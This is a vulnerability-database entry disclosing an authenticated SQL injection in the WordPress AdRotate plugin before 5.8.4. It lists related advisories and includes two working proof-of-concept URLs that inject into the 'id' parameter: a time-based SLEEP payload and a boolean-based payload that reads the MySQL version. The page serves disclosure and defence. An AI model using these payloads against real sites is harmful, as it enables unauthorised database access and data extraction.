Lucene search
+L

AdRotate < 5.8.4 - Authenticated SQL Injection

🗓️ 03 Jun 2020 00:00:00Reported by Nguyen Anh TienType 
wpexploit
 wpexploit
👁 790 Views

AdRotate SQL Injection vulnerability, allows authenticated users to execute SQL queries and extract system informatio

Related
Refs
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2021-24138
18 Mar 202115:15
attackerkb
cnnvd
CNNVD
Wordpress AdRotate SQL注入漏洞
18 Mar 202100:00
cnnvd
cnvd
CNVD
Wordpress AdRotate SQL Injection Vulnerability
19 Mar 202100:00
cnvd
cve
CVE
CVE-2021-24138
18 Mar 202114:57
cve
cvelist
Cvelist
CVE-2021-24138 AdRotate < 5.8.4 - Authenticated SQL Injection
18 Mar 202114:57
cvelist
euvd
EUVD
EUVD-2021-11052
7 Oct 202500:30
euvd
nvd
NVD
CVE-2021-24138
18 Mar 202115:15
nvd
osv
OSV
CVE-2021-24138
18 Mar 202115:15
osv
prion
Prion
Sql injection
18 Mar 202115:15
prion
redhatcve
RedhatCVE
CVE-2021-24138
22 May 202519:20
redhatcve
Rows per page
Param "id" is vulneable to SQL Injeciton.

Example 1:
http://example.com/wp-admin/admin.php?page=adrotate-statistics&view=group&id=1+AND+SLEEP%2810%29

Clear version: wp-admin/admin.php?page=adrotate-statistics&view=group&id=1 AND SLEEP(10)

This query will delay page load by 10 seconds

Example 2:
by using a boolean-based technique, one can extract info about the system.

http://example.com/wp-admin/admin.php?page=adrotate-statistics&view=group&id=2+AND+1%3D%28SELECT+IF+%28+GREATEST%28+ORD%28MID%28%40%40version%2C+1%2C+1%29%29%2C+1%29+%3D+53%2C+1%2C+0%29%29

Clear version: wp-admin/admin.php?page=adrotate-statistics&view=group&id=2 AND 1=(SELECT IF ( GREATEST( ORD(MID(@@version, 1, 1)), 1) = 53, 1, 0))

This query will check if the first char of MySQL version is "5" or not.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation